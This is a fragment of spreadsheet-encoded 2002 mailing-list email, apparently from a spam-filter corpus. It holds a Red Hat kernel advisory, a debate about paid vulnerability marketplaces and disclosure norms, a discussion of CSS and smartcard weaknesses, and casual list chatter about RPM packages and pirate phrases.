    <t>Red Hat Network has determined that the following advisory is applicable to one or more of the systems you have registered: Complete information about this errata can be found at the following location:      [URL]https://rhn.redhat.com[/URL] Security Advisory - RHSA-2002:158-09 ------------------------------------------------------------------------------ Summary: New kernel update available, fixes i810 video oops, several security issues Updated kernel packages are now available which fix an oops in the i810 3D kernel code. This kernel update also fixes a difficult to trigger race in the dcache (filesystem cache) code, as well as some potential security holes, although we are not currently aware of any exploits. Description: The 2.4.18-5 kernel introduced some safety checks in the VM subsystem that were triggered when exiting an X session while using 3D acceleration with the Intel i810/i815 chipset. Additionally, there was a difficult to trigger race in the dcache of the file system subsystem. This kernel update addresses both of these issues. In addition, there are fixes for potential security holes in the following drivers: stradis rio500 se401 usbvideo apm Finally, this kernel fixes a few files in the /proc file system which had the capability to expose kernel memory when abused. All of the security issues found during an audit and none of them,  at the time of this writing, have any known exploits. We would like to thank Silvio Cesare, Stas Sergeev, Andi Kleen, Solar Designer, and others for their auditing work. References: [URL]http://www.thefreeworld.net[/URL] ------------------------------------------------------------------------------ ------------- Taking Action ------------- You may address the issues outlined in this advisory in two ways:      - select your server name by clicking on its name from the list        available at the following location, and then schedule an        errata update for it:            [URL]https://rhn.redhat.com[/URL]      - run the Update Agent on each affected server. --------------------------------- Changing Notification Preferences --------------------------------- To enable/disable your Errata Alert preferences globally please log in to RHN and navigate from "Your RHN" / "Your Account" to the "Preferences" tab.         URL: [URL]https://rhn.spamassassin.taint.org[/URL] You can also enable/disable notification on a per system basis by selecting an individual system from the "Systems List". From the individual system view click the "Details" tab. --------------------- Affected Systems List --------------------- This Errata Advisory may apply to the systems listed below. If you know that this errata does not apply to a system listed, it might be possible that the package profile for that server is out of date. In that case you should run 'up2date -p' as root on the system in question to refresh your software profile. There is 1 affected system registered in 'Your RHN' (only systems for which you have explicitly enabled Errata Alerts are shown). Release   Arch       Profile Name --------  --------   ------------ 7.3       i686       jalapeno                                 The Red Hat Network Team This message is being sent by Red Hat Network Alert to:     RHN user login:        spamassassin.taint.org     Email address on file:  If you lost your RHN password, you can use the information above to retrieve it by email from the following address:     [URL]https://rhn.redhat.com[/URL] To cancel these notices, go to:     [URL]https://rhn.redhat.com[/URL]</t>
  </si>
  <si>
    <t>https://rhn.redhat.com http://www.thefreeworld.net https://rhn.redhat.com https://rhn.spamassassin.taint.org https://rhn.redhat.com https://rhn.redhat.com</t>
  </si>
  <si>
    <t>To: Kragen Sitaker &lt;kragen@pobox.com&gt;\nFrom: Tom &lt;tomwhore@slack.net&gt;\nDate: Thu, 22 Aug 2002 01:18:17 -0400 (EDT)</t>
  </si>
  <si>
    <t>Thu, 22 Aug 2002 01:18:17 -0400 (EDT)</t>
  </si>
  <si>
    <t>Re: the underground software vulnerability marketplace and its hazards</t>
  </si>
  <si>
    <t>On Thu, 22 Aug 2002, Kragen Sitaker wrote:\n\n--]If this kind of secret traffic is allowed to continue, it will pose a\n--]very serious threat to our computer communications infrastructure.\n\nThe goverment mindset is now, If you know a vulnerability and let it on to\nanyone BUT the manufacturer you are a criminal...end of story, go directly\nto jail do not collect 200$ and tip a hat to the citizen infromants who\nhelped get you there.\n\nSo this leaves lucrative contracts for those who find and then NDA the\nfind with the manufacturer with, if the finder is smart, an imunity from\nany prosecution in the future so long as the NDA is kept.\n\n\nOh my droogie, those who are in the shirt hairs hanging of the new age\nemployemnt market, this could be your golden molden moment to strike the\nnew gold mine...and perhaps coopt it fromthe start.....\n\nThere are two ways to fight the powers that be, from with out and from\nwith in...lets not turn a blind eye towards one becuase someone, yes\nsomeone, will do the deed and if that someone does not have the "make em\nweak for the revultion to come" mindset then we are all and truly doomed.\n\nFight without\nFight within\nand make some scratch on the differences between:)-\n\n\n-tomwsmf\n\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: &lt;webdev@linux.ie&gt;\nFrom: "AJ McKee" &lt;aj.mckee@nmtbmedia.com&gt;\nDate: Thu, 22 Aug 2002 01:00:29 +0100</t>
  </si>
  <si>
    <t>Thu, 22 Aug 2002 01:00:29 +0100</t>
  </si>
  <si>
    <t>"AJ McKee" &lt;aj.mckee@nmtbmedia.com&gt;</t>
  </si>
  <si>
    <t>[Webdev] Very nice tool</t>
  </si>
  <si>
    <t>-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hi all,  Normally I would not post such things, but this is really cool for a visual idea of how ppl are linking to you [URL]http://www.touchgraph.com[/URL] It may not work from the submit button, but one the java appelet is loaded then try your URL. Its really quite nice. Aj - ---------------------------------------- AJ McKee NMTB media Phone: (Europe) +353 1 473 53 72        (North America) +1 206 339 4326 Fax:   (Europe) +353 1 473 53 73        (North America) +1 206 339 4326 Website: [URL]http://www.nmtbmedia.com[/URL] - ----------------------------------------- 	 -----BEGIN PGP SIGNATURE----- Version: PGPfreeware 6.5.8 for non-commercial use  Comment: PGP/GPG Keys located at [URL]http://www.nmtbmedia.com[/URL] iQA/AwUBPWQpnIHmA/TOOP95EQLE6gCcDlPEdah2rBmwTNUixPi4aung3g8AoJTK llXGK8OOdlMSV/0o3YynpOEa =Kxad -----END PGP SIGNATURE----- _______________________________________________ Webdev mailing list Webdev@linux.ie [URL]http://www.linux.ie[/URL]</t>
  </si>
  <si>
    <t>http://www.touchgraph.com http://www.nmtbmedia.com http://www.nmtbmedia.com http://www.linux.ie</t>
  </si>
  <si>
    <t>To: fork@spamassassin.taint.org\nFrom: kragen@pobox.com (Kragen Sitaker)\nDate: Thu, 22 Aug 2002 00:24:54 -0400 (EDT)</t>
  </si>
  <si>
    <t>Thu, 22 Aug 2002 00:24:54 -0400 (EDT)</t>
  </si>
  <si>
    <t>the underground software vulnerability marketplace and its hazards</t>
  </si>
  <si>
    <t>On August 7th, an entity known as "iDEFENSE" sent out an announcement,\nwhich is appended to this email.  Briefly, "iDEFENSE", which bills\nitself as "a global security intelligence company", is offering cash\nfor information about security vulnerabilities in computer software\nthat are not publicly known, especially if you promise not to tell\nanyone else.\n\nIf this kind of secret traffic is allowed to continue, it will pose a\nvery serious threat to our computer communications infrastructure.\n\nAt the moment, the dominant paradigm for computer security research\nknown as "full disclosure"; people who discover security\nvulnerabilities in software tell the vendor about them, and a short\nwhile later --- after the vendor has had a chance to fix the problem\n--- they publish the information, including code to exploit the\nvulnerability, if possible.  \n\nThis method has proven far superior to the old paradigm established by\nCERT in the late 1980s, which its proponents might call "responsible\ndisclosure" --- never release working exploit code, and never release\nany information on the vulnerability before all vendors have released\na patch.  This procedure often left hundreds of thousands of computers\nvulnerable to known bugs for months or years while the vendors worked\non features, and often, even after the patches were released, people\nwouldn't apply them because they didn't know how serious the problem\nwas.\n\nThe underground computer criminal community would often discover and\nexploit these same holes for months or years while the "responsible\ndisclosure" process kept their victims, who had no connections in the\nunderground, vulnerable.\n\nThe problem with this is that vulnerabilities that are widely known\nare much less dangerous, because their victims can take steps to\nreduce their potential impact --- including disabling software,\nturning off vulnerable features, filtering traffic in transit, and\ndetecting and responding to intrusions.  They are therefore much less\nuseful to would-be intruders.  Also, software companies usually see\nsecurity vulnerabilities in their software as PR problems, and so\nprefer to delay publication (and the expense of fixing the bugs) as\nlong as possible.\n\niDEFENSE is offering a new alternative that appears far more dangerous\nthan either of the two previous paradigms.  They want to be a buyer in\na marketplace for secret software vulnerability information, rewarding\ndiscoverers of vulnerabilities with cash.  \n\nNot long before, Snosoft, a group of security researchers evidently\nincluding some criminal elements, apparently made an offer to sell the\nsecrecy of some software vulnerability information to the software\nvendor; specifically, they apparently made a private offer to\nHewlett-Packard to keep a vulnerability in HP's Tru64 Unix secret if\nHP retained Snosoft's "consulting services".  HP considered this\nextortion and responded with legal threats, and Snosoft published the\ninformation.\n\nIf this is allowed to happen, it will cause two problems which,\ntogether, add up to a catastrophe.\n\nFirst, secret software vulnerability information will be available to\nthe highest bidder, and to nobody else.  For reasons explained later,\nI think the highest bidders will generally be organized crime\nsyndicates, although that will not be obvious to the sellers.\n\nSecond, finding software vulnerabilities and keeping them secret will\nbecome lucrative for many more talented people.  The result will be\n--- just as in the "responsible disclosure" days --- that the good\nguys will remain vulnerable for months and years, while the majority\nof current vulnerabilities are kept secret.\n\nI've heard it argued that the highest bidders will generally be the\nvendors of the vulnerable software, but I don't think that's\nplausible.  If someone can steal $20 000 because a software bug lets\nthem, the software vendor is never held liable; often, in fact, the\npeople who administer the software aren't liable, either --- when\ncredit card data are stolen from an e-commerce site, for example.\nKnowing about a vulnerability before anyone else might save a web-site\nadministrator some time, and it might save the software vendor some\nnegative PR, but it can net the thief thousands of dollars.\n\nI think the highest bidders will be those for whom early vulnerability\ninformation is most lucrative --- the thieves who can use it to\nexecute the largest heists without getting caught.  Inevitably, that\nmeans organized crime syndicates, although the particular gangs who\nare good at networked theft may not yet exist.\n\nThere might be the occasional case where a market leader, such as\nMicrosoft, could make more money by giving their competitors bad PR\nthan a gang could make by theft.  Think of a remote-root hole in\nSamba, for example.\n\nRight now, people who know how to find security exploits are either\nmotivated by personal interest in the subject, motivated by the public\ninterest, motivated by a desire for individual recognition, or\npersonally know criminals that benefit from their exploits.  Creating\na marketplace in secret vulnerability information would vastly\nincrease the availability of that information to the people who can\nafford to pay the most for it: spies, terrorists, and organized crime.\n\nLet's not let that happen.\n\n\n\n\nThis is the original iDEFENSE announcement:\n\nFrom: Sunil James [mailto:SJames@iDefense.com]\nSent: Wednesday, August 07, 2002 12:32 PM\nSubject: Introducing iDEFENSE's Vulnerability Contributor Program\n\n\nGreetings,\n\niDEFENSE is pleased to announce the official launch of its Vulnerability\nContributor Program (VCP). The VCP pays contributors for the advance\nnotification of vulnerabilities, exploit code and malicious code.\n\niDEFENSE hopes you might consider contributing to the VCP. The following\nprovides answers to some basic questions about the program:\n\nQ. How will it work?\nA. iDEFENSE understands the majority of security researchers do not publish\nsecurity research for compensation; rather, it could be for any of a number\nof motivations, including the following:\n\n         * Pure love of security research\n         * The desire to protect against harm to targeted networks\n         * The desire to urge vendors to fix their products\n         * The publicity that often accompanies disclosure\n\nThe VCP is for those who want to have their research made public to the\nInternet community, but who would also like to be paid for doing the\nwork.The compensation will depend, among other things, on the following\nitems:\n\n         * The kind of information being shared (i.e. vulnerability or exploit)\n         * The amount of detail and analysis provided\n         * The potential severity level for the information shared\n         * The types of applications, operating systems, and other\n           software and hardware potentially affected\n         * Verification by iDEFENSE Labs\n         * The level of exclusivity, if any, for data granted to iDEFENSE\n\nQ. Who should contribute to the VCP?\nA. The VCP is open to any individual, security research group or other\nentity.\n\nQ. Why are you launching this program?\nA. Timeliness remains a key aspect in security intelligence. Contributions\nto some lists take time before publication to the public at large. More\noften, many of these services charge clients for access without paying the\noriginal contributor. Under the iDEFENSE program, the contributor is\ncompensated, iDEFENSE Labs verifies the issue, and iDEFENSE clients and the\npublic at large are warned in a timely manner.\n\nQ. Who gets the credit?\nA. The contributor is always credited for discovering the vulnerability or\nexploit information.\n\nQ. When can I contribute?\nThe VCP is active. You are welcome to begin contributing today.\n\nTo learn more, go to [URL]http://www.idefense.com[/URL] If you have\nquestions or would like to sign up as a contributor to the VCP, please\ncontact us at contributor@idefense.com.\n\nRegards,\n\nSunil James\nTechnical Analyst\niDEFENSE\n\n"iDEFENSE is a global security intelligence company that proactively\nmonitors sources throughout the world -- from technical vulnerabilities and\nhacker profiling to the global spread of viruses and other malicious code.\nThe iALERT security intelligence service provides decision-makers, frontline\nsecurity professionals and network administrators with timely access to\nactionable intelligence and decision support on cyber-related threats.\niDEFENSE Labs is the research wing that verifies vulnerabilities, examines\nthe behavior of exploits and other malicious code and discovers new\nsoftware/hardware weaknesses in a controlled lab environment."\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>http://www.idefense.com http://xent.com</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: Jesse Keating &lt;hosting@j2solutions.net&gt;\nDate: Thu, 19 Sep 2002 22:10:46 -0700</t>
  </si>
  <si>
    <t>Thu, 19 Sep 2002 22:10:46 -0700</t>
  </si>
  <si>
    <t>sylpheed-claws</t>
  </si>
  <si>
    <t>Have you thought of bumping up sylpheed-claws?  I see sylpheed got a bump... show some claws love?  (; --  Jesse Keating j2Solutions.net Mondo DevTeam ([URL]www.mondorescue.org[/URL] Was I helpful?  Let others know:  [URL]http://svcs.affero.net[/URL] _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>To: "Justin Mason" &lt;yyyy@spamassassin.taint.org&gt;,\nFrom: "Michael Moncur" &lt;mgm@starlingtech.com&gt;\nDate: Thu, 19 Sep 2002 21:42:52 -0600</t>
  </si>
  <si>
    <t>Thu, 19 Sep 2002 21:42:52 -0600</t>
  </si>
  <si>
    <t>RE: [SAdev] phew!</t>
  </si>
  <si>
    <t>&gt; Yes, I think some others, (mgm?) have spamtrap data in there too.\n&gt;\n\nMy corpus is about 50% spamtrap spam at any given time. Let me know if I\nshould leave that out next time, I do keep it separate. My spamtraps are\npretty clean of viruses and bounce messages most of the time.\n\n--\nMichael Moncur  mgm at starlingtech.com  [URL]http://www.starlingtech.com[/URL]\n"Lack of money is no obstacle. Lack of an idea is an obstacle." --Ken Hakuta</t>
  </si>
  <si>
    <t>http://www.starlingtech.com</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: "" Angles " Puglisi" &lt;angles@aminvestments.com&gt;\nDate: Thu, 19 Sep 2002 20:28:51 +0000</t>
  </si>
  <si>
    <t>Thu, 19 Sep 2002 20:28:51 +0000</t>
  </si>
  <si>
    <t>Re: New testing packages</t>
  </si>
  <si>
    <t>Matthias Saou (matthias@rpmforge.net) wrote*: &gt;- I've rebuilt a new "alsaplayer" package based on Angle's one. Cool, one less package to maintain :) One interesting thing about alsaplayer is that RedHat's XMMS package in RH8 will probably not play mp3 files. But alsaplayer does play mp3s "out of the box". Also, they are developing rapidly in their CVS and looks like their next version of alsaplaer will be pretty cool, but I have no idea when it will be ready. -- That's "angle" as in geometry. _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>To: exmh-users@spamassassin.taint.org\nFrom: Tony Nugent &lt;tony@linuxworks.com.au&gt;\nDate: Thu, 19 Sep 2002 19:46:01 +1000</t>
  </si>
  <si>
    <t>Thu, 19 Sep 2002 19:46:01 +1000</t>
  </si>
  <si>
    <t>customising FTOC display for specific folders...</t>
  </si>
  <si>
    <t>Is there any way to customise the folder table of contents for\nspecific folders?\n\nI know it is possible to do per-folder customisation with components\nand replcomps for message templates, but what about -form format\nfiles for scan?\n\nCheers\nTony\n\n\n\n_______________________________________________\nExmh-users mailing list\nExmh-users@redhat.com\n[URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>To: nan\nFrom: Ben Hammersley &lt;ben@benhammersley.com&gt;\nDate: Thu, 19 Sep 2002 15:26:18 +0100</t>
  </si>
  <si>
    <t>Thu, 19 Sep 2002 15:26:18 +0100</t>
  </si>
  <si>
    <t>Ben Hammersley &lt;ben@benhammersley.com&gt;</t>
  </si>
  <si>
    <t>Re: Avast there matey</t>
  </si>
  <si>
    <t>On Thursday, Sep 19, 2002, at 14:51 Europe/London, Bill Kearney wrote:\n\n&gt;&gt; From the completely unrelated but funny department...\n&gt;\n&gt; "Talk like a Pirate Day".\n&gt; [URL]http://www.washingtonpost.com[/URL]\n&gt;\n&gt; Which is today, of course.\n&gt;\n&gt; That and 'piratecore' rapping style...\n&gt; [URL]http://poorman.blogspot.com[/URL]\n&gt;\n&gt; Anything, just anything, to get us off the geek dating tips topic....\n&gt;\n&gt; -Bill Kearney\n&gt;\n\n\nArrr, he be a scurvy dog, that Bill Kearney.</t>
  </si>
  <si>
    <t>http://www.washingtonpost.com http://poorman.blogspot.com</t>
  </si>
  <si>
    <t>To: "'Bryan Feir'" &lt;bryan@sgl.crestech.ca&gt;,\nFrom: "Michael McKay" &lt;mmckay@iscubed.com&gt;\nDate: Thu, 19 Sep 2002 14:44:22 -0700</t>
  </si>
  <si>
    <t>Thu, 19 Sep 2002 14:44:22 -0700</t>
  </si>
  <si>
    <t>"Michael McKay" &lt;mmckay@iscubed.com&gt;</t>
  </si>
  <si>
    <t>"'Bryan Feir'" &lt;bryan@sgl.crestech.ca&gt;,</t>
  </si>
  <si>
    <t>RE: Secure Sofware Key</t>
  </si>
  <si>
    <t>Bryan Feir [mailto:bryan@sgl.crestech.ca] wrote: \n\n&gt;Of course, once one player key was broken, dealing with the rest became\n&gt; a known plaintext attack, and the rest of the player keys went down\nlike\n&gt; a row of dominos.\n\nThe actual follow-up to the Xing player break was more interesting than\nthat.  The mere knowledge of known plaintext (a corresponding input and\noutput) does not necessarily make it trivial to break a properly\ndesigned systems and/or algorithm. The primary reason it was easy for\nCSS is because the CSS key was only 40-bits, and thereby easy to break\nwith exhaustive search attacks.  It was only 40-bits (speculated)\nbecause of a misunderstanding of the government cryptography export\nrules at the time.\n\nEven more interesting, to me at least, was that soon after the Xing\nplayer break, people started studying the CSS algorithm itself.  They\nrapidly found serious design flaws which left the 40-bit CSS algorithm\nwith an actual strength of around 23-bits (from memory, and new attacks\nmight have further reduced the strength).  This is another great example\nshowing why proprietary cryptography algorithms should be viewed with\nthe greatest of suspicion.\n\n\nOn Tue, Sep 03, 2002 at 09:03:40PM -0400, Yannick Gingras wrote:\n&gt; This make me wonder about the relative protection of smart cards.\nThey have \n&gt; an internal procession unit around 4MHz.  Can we consider them as\ntrusted \n&gt; hardware ?  \n\nYes and no.  You can put a limited amount of trust in a smart card.\nThere have been any number of very clever attacks against smartcards\n(Ross Anderson in the UK has documented quite a few of these), and\nsmartcard manufactures are usually one step behind these attacks.  A\nwell designed system assumes that a system smartcard will be completely\ncompromised at some point, giving an adversary all of the secrets\ncontained in the smartcard.  The cryptography industry has developed a\nvariety of techniques that can reduce the impact of a compromise,\nincluding unique keys per smartcard and forward security techniques.\n\n\nLuciano Rocha [strange@nsk.yi.org] wrote: \n\n&gt; The problem is that that piece of hardware is trustworthy, but the\nrest of\n&gt; the PC isn't, so a cracker just needs to simulate the lock/smart card,\nor\n&gt; peek at the executable after the lock has been deactivated.\n\nGoing back to the original question, once the encrypted material goes\noutside the trusted hardware, it is impossible to "unbreakably" protect\nit.  There may be some mitigation steps you can take, such as the SDMI\nwatermarking, but most schemes to date have been easily broken.  \n\nAnother consideration is the value of what you are trying to protect.\nWhile there is no such thing as unbreakable, adding more cost (both in\nterms of price and hassle-factor) can greatly improve the protection.\nSince you are talking about the use of standard PC workstations, I\npresume what you are trying to protect is not THAT valuable.  I'm afraid\nmost security measures don't come for free.\n\n\nMichael McKay \nDirector of Software Development \nmmckay@iscubed.com \n\n  Information Security Systems &amp; Services Inc. \n  19925 Stevens Creek Blvd. Cupertino, CA 95014 \n  Phone: 408.725.7136  x 4138    Fax: 408.973.7239   [URL]www.iscubed.com[/URL]</t>
  </si>
  <si>
    <t>www.iscubed.com</t>
  </si>
  <si>
    <t>To: fork@spamassassin.taint.org\nFrom: "Russell Turpin" &lt;deafbox@hotmail.com&gt;\nDate: Thu, 19 Sep 2002 13:41:34 +0000</t>
  </si>
  <si>
    <t>Thu, 19 Sep 2002 13:41:34 +0000</t>
  </si>
  <si>
    <t>Robert Harley: &gt;&gt;BTW, I wasn't aware that the 1st Amendment mandated that crap must be  &gt;&gt;FoRKed. Chuck Murcko : &gt;It doesn't, BTW. It says the right to free speech shall not be abridged.  &gt;That means *you* can't say anything may not be FoRKed or printed or  &gt;whatever. Actually, it means just the opposite. The first amendment guarantees Harley's right to say just that. For the outlets where he has editorial control, it even guarantees his right to CENSOR content published through those outlets. The first amendment doesn't limit Harley's speech, and it is neutral with regard to the selection policies of FoRK and other private venues. _________________________________________________________________ MSN Photos is the easiest way to share and print your photos:  [URL]http://photos.msn.com[/URL]</t>
  </si>
  <si>
    <t>http://photos.msn.com</t>
  </si>
  <si>
    <t>To: fork@spamassassin.taint.org\nFrom: "Russell Turpin" &lt;deafbox@hotmail.com&gt;\nDate: Thu, 19 Sep 2002 13:34:36 +0000</t>
  </si>
  <si>
    <t>Thu, 19 Sep 2002 13:34:36 +0000</t>
  </si>
  <si>
    <t>Re: [VoID] a new low on the personals tip...</t>
  </si>
  <si>
    <t>Owne Byrne:\n&gt;Sure if you're willing to risk firing, lawsuits, etc. The last full time \n&gt;job I had the sexual harassement seminar was pretty clear - yes you can \n&gt;have relationships at the office, but its extremely difficult, and the \n&gt;pitfalls are\n&gt;horrendous.\n\nDespite that, this is how a lot of couples meet.\nPeople tease me about Carolyn, that I just hired\na lot of software engineering babes, and then\nchose the one I liked best. ;-)\n\n\n\n\n\n\n_________________________________________________________________\nSend and receive Hotmail on your mobile device: [URL]http://mobile.msn.com[/URL]</t>
  </si>
  <si>
    <t>To: fork@spamassassin.taint.org\nFrom: "Russell Turpin" &lt;deafbox@hotmail.com&gt;\nDate: Thu, 19 Sep 2002 13:30:45 +0000</t>
  </si>
  <si>
    <t>Thu, 19 Sep 2002 13:30:45 +0000</t>
  </si>
  <si>
    <t>Re: AA Meetings the Hottest Place to Meet Women With Big Bucks</t>
  </si>
  <si>
    <t>R. A. Hettinga:\n&gt;Church, AA, same diff?\n\nIt's difficult to measure which is the greater\nliability in a potential mate, religiosity or\nalcoholism.\n\n\n_________________________________________________________________\nJoin the worlds largest e-mail service with MSN Hotmail. \n[URL]http://www.hotmail.com[/URL]</t>
  </si>
  <si>
    <t>To: fork@spamassassin.taint.org\nFrom: Kragen Sitaker &lt;kragen@pobox.com&gt;\nDate: Thu, 19 Sep 2002 13:18:04 -0400</t>
  </si>
  <si>
    <t>Thu, 19 Sep 2002 13:18:04 -0400</t>
  </si>
  <si>
    <t>Owen Byrne writes:\n&gt; [quoting [URL]http://www.quinion.com[/URL]]\n&gt; *SHIVER MY TIMBERS*\n&gt; \n&gt; /From Tad Spencer/: "Please could you tell me where the phrase /shiver \n&gt; my timbers/ originated?"\n&gt; \n&gt; This is one of those supposedly nautical expressions that seem to be \n&gt; better known through a couple of appearances in fiction than by any \n&gt; actual sailors' usage.\n&gt; \n&gt; It's an exclamation that may allude to a ship striking some rock or \n&gt; other obstacle so hard that her timbers shiver, or shake, so implying a \n&gt; calamity has occurred. It is first recorded as being used by Captain \n&gt; Frederick Marryat in /Jacob Faithful/ in 1835: "I won't thrash you Tom. \n&gt; Shiver my timbers if I do".\n\nIt seems implausible to me that "shiver" here means "to shake"; I don't\nrecall seeing the word used transitively in that sense, and web1913\nlists that sense as "v. i.", or intransitive.  The transitive sense of\n"shiver", which we no longer use but which people used widely in the\n1800s (web1913 doesn't even list it as archaic or obsolete), means\n"to shatter into splinters, normally with a blow".\n\nShivering a boat's timbers, of course, leaves you with no boat.\n(Shivering some of them, which will happen if you hit a rock hard enough,\nleaves you with a sinking boat.)\n\nSo, "Shiver my timbers if I do," can be reasonably interpreted as a more\nvivid way of saying, "May I die suddenly if I do."  The interpretation\nsuggested by Quinion, "May my boat be damaged," neither makes as much\nsense in context nor obeys the normal rules of grammar.\n\nI've sent a copy of this to Quinion.</t>
  </si>
  <si>
    <t>http://www.quinion.com</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: Matthias Saou &lt;matthias@rpmforge.net&gt;\nDate: Thu, 19 Sep 2002 13:08:25 +0200</t>
  </si>
  <si>
    <t>Thu, 19 Sep 2002 13:08:25 +0200</t>
  </si>
  <si>
    <t>Re: --with ...</t>
  </si>
  <si>
    <t>Once upon a time, C.Lee wrote : &gt;  &gt; I think I'll use this "--with " switch more and more where &gt;  &gt; possible. &gt; 	Mmm, great stuff ... Now to get the RedHat Samba packager to do the &gt; 	same thing ... I'm sure that if you file a bugzilla entry with a relevant patch against the spec file, chances of getting the change done are on your side ;-) &gt; 	I have used there spec file and fun a few problems in it, and one &gt; 	of them was just hashing out things for other use ... &gt;  &gt; 	Now to get to grips with the Kernel ... still have not found and &gt; 	easy way to rebuild the Kernel without having to wait and hour for &gt;       it to generate the headers for all arch ... arrrrhhhh ... The problem is that "--with  --without " is clearly not meant to change deeply the way a package is built. Its use would be more like enabling/disabling gpg, ldap, whateversql support in packages as it's not possible to use something like "--with-=" which could be used for a much wider scope. Matthias --  Clean custom Red Hat Linux rpm packages : [URL]http://freshrpms.net[/URL] Red Hat Linux release 7.3 (Valhalla) running Linux kernel 2.4.18-10 Load : 0.00 0.12 0.32, AC on-line, battery charging: 100% (4:47) _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: "C.Lee Taylor" &lt;leet@leenx.co.za&gt;\nDate: Thu, 19 Sep 2002 12:42:31 +0200</t>
  </si>
  <si>
    <t>Thu, 19 Sep 2002 12:42:31 +0200</t>
  </si>
  <si>
    <t>"C.Lee Taylor" &lt;leet@leenx.co.za&gt;</t>
  </si>
  <si>
    <t>Greetings ... &gt; PS: Yup, I'm back from my holidays ;-) 	I hope you did not miss us at all ... ;-0  &gt; I think I'll use this "--with " switch more and more where  &gt; possible. 	Mmm, great stuff ... Now to get the RedHat Samba packager to do the same  thing ... 	I have used there spec file and fun a few problems in it, and one of them  was just hashing out things for other use ... 	Now to get to grips with the Kernel ... still have not found and easy way to  rebuild the Kernel without having to wait and hour for it to generate the  headers for all arch ... arrrrhhhh ... Mailed Lee _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>To: fork@spamassassin.taint.org\nFrom: Owen Byrne &lt;owen@permafrost.net&gt;\nDate: Thu, 19 Sep 2002 12:06:05 -0300</t>
  </si>
  <si>
    <t>Thu, 19 Sep 2002 12:06:05 -0300</t>
  </si>
  <si>
    <t>Ben Hammersley wrote:\n\n&gt;\n&gt; On Thursday, Sep 19, 2002, at 14:51 Europe/London, Bill Kearney wrote:\n&gt;\n&gt;&gt;&gt; From the completely unrelated but funny department...\n&gt;&gt;\n&gt;&gt;\n&gt;&gt; "Talk like a Pirate Day".\n&gt;&gt; [URL]http://www.washingtonpost.com[/URL]\n&gt;&gt;\n&gt;&gt; Which is today, of course.\n&gt;&gt;\n&gt;&gt; That and 'piratecore' rapping style...\n&gt;&gt; [URL]http://poorman.blogspot.com[/URL]\n&gt;&gt;\n&gt;&gt; Anything, just anything, to get us off the geek dating tips topic....\n&gt;&gt;\n&gt;&gt; -Bill Kearney\n&gt;&gt;\n&gt;\n&gt;\n&gt; Arrr, he be a scurvy dog, that Bill Kearney.\n\nWell, shiver me timbers, but my favorite pirate phrase is missing from \nboth of those.Arrr....\nand wondering if there's a rap equivalent.\nOwen\n\n[URL]http://www.quinion.com[/URL]\n*Q AND A SECTION*\n\n*SHIVER MY TIMBERS*\n\n/From Tad Spencer/: "Please could you tell me where the phrase /shiver \nmy timbers/ originated?"\n\nThis is one of those supposedly nautical expressions that seem to be \nbetter known through a couple of appearances in fiction than by any \nactual sailors' usage.\n\nIt's an exclamation that may allude to a ship striking some rock or \nother obstacle so hard that her timbers shiver, or shake, so implying a \ncalamity has occurred. It is first recorded as being used by Captain \nFrederick Marryat in /Jacob Faithful/ in 1835: "I won't thrash you Tom. \nShiver my timbers if I do".\n\nIt has gained a firm place in the language because almost fifty years \nlater Robert Louis Stevenson found it to be just the kind of old-salt \nsaying that fitted the character of Long John Silver in /Treasure \nIsland/: "Cross me, and you'll go where many a good man's gone before \nyou ... some to the yard-arm, shiver my timbers, and some by the board, \nand all to feed the fishes". Since then, it's mainly been the preserve \nof second-rate seafaring yarns.</t>
  </si>
  <si>
    <t>http://www.washingtonpost.com http://poorman.blogspot.com http://www.quinion.com</t>
  </si>
  <si>
    <t>To: "Mr. FoRK" &lt;fork_list@hotmail.com&gt;\nFrom: Tom &lt;tomwhore@slack.net&gt;\nDate: Thu, 19 Sep 2002 11:19:06 -0400 (EDT)</t>
  </si>
  <si>
    <t>Thu, 19 Sep 2002 11:19:06 -0400 (EDT)</t>
  </si>
  <si>
    <t>Ahhhh Dave Winer..Seems like only yesterday fork was knee deep in\nwinerrants..hes gone away though...so sad (insert real honest to goshness\ntears)\n\nBut the past  live on...in the archives...\n\nRemeber when Dave was being betrayed by O'Reilly?\n[URL]http://www.xent.com[/URL]\n\n\nOn "closed source" justifications\n[URL]http://www.xent.com[/URL]\n\n\nDaves trys to grok fork\n[URL]http://www.xent.com[/URL]\n\n\nNT runs just as good as linux...really\n[URL]http://www.xent.com[/URL]\n\nThere are a few months of this stuff (just google or forkcrawl the\narchives) then he got truly fedup with all our  not polite unfresh\nthinking and went silent, for the most part.\n\noh well, back to life.\n\n-tom</t>
  </si>
  <si>
    <t>http://www.xent.com http://www.xent.com http://www.xent.com http://www.xent.com</t>
  </si>
  <si>
    <t>To: razor-users@example.sourceforge.net\nFrom: Jeffrey Taylor &lt;jeff.taylor@ieee.org&gt;\nDate: Thu, 19 Sep 2002 11:11:58 -0500</t>
  </si>
  <si>
    <t>Thu, 19 Sep 2002 11:11:58 -0500</t>
  </si>
  <si>
    <t>Jeffrey Taylor &lt;jeff.taylor@ieee.org&gt;</t>
  </si>
  <si>
    <t>Re: [Razor-users] Using razor with maildrop</t>
  </si>
  <si>
